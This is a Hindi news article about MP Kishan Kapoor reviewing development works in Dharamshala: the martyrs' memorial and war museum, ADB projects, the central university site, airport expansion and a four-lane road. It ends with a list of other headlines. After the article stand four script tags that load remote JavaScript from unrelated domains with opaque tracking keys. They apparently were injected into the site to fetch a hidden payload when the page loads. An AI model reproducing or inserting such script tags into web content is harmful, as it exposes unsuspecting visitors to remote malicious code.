<p>लोकसभा सांसद किशन कपूर ने आज सोमवार को धर्मशाला के मिनी सचिवालय में विभिन्न कार्यो की प्रगति की समीक्षा के लिए आयोजित बैठक की अध्यक्षता करते हुए कहा कि धर्मशाला शहीद स्मारक शहीदों का मंदिर है औऱ इसकी सुन्दरता बढ़ाने के लिए धन की कोई कमी नहीं रखी जाएगी। युद्व संग्रहालय औऱ शहीद स्मारक स्थल बड़ी संख्या में धर्मशाला आने वाले पर्यटकों के लिए यह एक दर्शनीय स्थल होगा। इसे एक ऐसी जगह के तौर पर विकसित किया जा रहा है। जहां लोग सैनिकों और राष्ट्र की सुरक्षा में किए गए उनके असाधारण प्रयासों के प्रति सम्मान व्यक्त करेंगे।</p>
<p>उन्होंने सम्बन्धित अधिकारियों को कहा कि शहीद स्मारक की सुंदरता से जुड़े कार्यों को प्राथमिकता के आधार पर पूरा किया जाए। शहीद स्मारक और युद्ध संग्रहालय के माध्यम से वीरों की कुर्बानियों और उनकी यादें हमेशा तरोताजा रहेंगी। उन्होंने कहा कि युद्ध संग्रहालय सेना के युद्धों और संघर्षों की शिक्षा एवं देशभक्ति को बढ़ावा देने के लिए ऐतिहासिक महत्व से जुड़ी चीजों के संग्रह, संरक्षण, व्याख्या और सैन्य साजोसामान की प्रदर्शनी करने वाला संस्थान होगा। उन्होंने कहा कि शहीद स्मारक में सौन्दर्यीकरण के विभिन्न कार्यों को पूरा करने के लिए पर्याप्त धन उपलब्ध करवाने का आश्वासन दिया।<br />
<br />
<span style=”color:#c0392b”><strong>अघंजर महादेव में एशियन विकास बैंक द्वारा किए कामों का लिया जायजा</strong></span></p>
<p>किशन कपूर ने अघंजर महादेव में एशियन विकास बैंक द्वारा किये जा रहे कार्यों की प्रगति का जायजा लिया और संबंधित अधिकारियों को निर्देश दिये कि किये जा रहे कार्यों में पूर्ण गुणवत्ता बरती जाए। कार्य की गुणवत्ता को लेकर कोई समझौता नहीं किया जाएगा। उन्होंने भागसूनाग में भी जल्द काम शुरू करने के संबंधित विभागीय अधिकारियों को निर्देश दिये। कपूर ने कहा कि मुख्यमंत्री लोक भवन योजना के तहत लोक भवनों का निर्माण किया जा रहा है। जिसका उद्देश्य ग्रामीण क्षेत्रों में विभिन्न सामाजिक कार्यक्रमों के लिए एक भवन उपलब्ध करवाना है। उन्होंने सम्बन्धित विभाग को लोक भवनों के लिए जमीन तलाशने के निर्देश दिये ताकि लोक भवनों का निर्माण करवाया जा सके।</p>
<p>किशन कपूर ने केन्द्रीय विश्वविद्यालय के निर्माण को लेकर प्रगति का जायजा लिया और कहा कि जदरांगल में सीयू के निर्माण को लेकर प्रक्रिया को शीघ्र पूरा करने के लिये तत्परता से कार्य किया जाए। उन्होंने सम्बंधित विभागों को आपसी समन्वय से काम करने के निर्देश दिए। उन्होंने कहा कि केंद्रीय विश्वविद्यालय को लेकर लोगों की बहुत अपेक्षाएं और आशायें हैं, इस कार्य को प्राथमिकता पर करें।</p>
<p>कपूर ने कहा कि धर्मशाला में पर्यटन की अनेक संभावनाएं हैं इसके लिए कांगड़ा जिला के गगल में बडे़ हवाई अड्डे का विस्तार सामरिक और पर्यटन दृष्टि से अधिक महत्वपूर्ण है। बड़ा हवाई अड्डा बनने से प्रदेश के पर्यटन क्षेत्र में व्यापक विस्तार होगा और इस क्षेत्र में लोगों को स्वरोजगार के अवसर भी प्राप्त होंगे। कपूर ने सामरिक दृष्टि से अहम पठानकोट-मंडी फोरलेन के निर्माण कार्य की प्रगति को लेकर अधिकारियों से बातचीत की और उचित कार्यवाही के निर्देश दिये।<br />
</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1582540607338″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Nb Sub Rakesh Kumar Martyrdom : जम्मू-कश्मीर के किश्तवाड़ जिले में भारतीय सेना और आतंकियों…
Freedom Fighters Welfare Board Himachal: हमीरपुर के परिधि गृह में हिमाचल प्रदेश स्वतंत्रता सेनानी एवं…
Shri Ram-Sita wedding Mandi: मंडी के पड्डल मैदान में आयोजित नौ दिवसीय श्रीरामार्चा महायज्ञ और…
Breastu Ram returns lost cash: ईमानदार होना इंसान का आभूषण होता है। ईमानदार व्यक्ति…
Hamirpur State Boxing Championship winners: हमीरपुर के गांधी चौक में 53वीं सीनियर स्टेट बॉक्सिंग चैंपियनशिप…
Himachal Pradesh politics: हिमाचल प्रदेश विधानसभा के पूर्व अध्यक्ष और कांगड़ा-चंबा भाजपा प्रभारी, विपिन सिंह…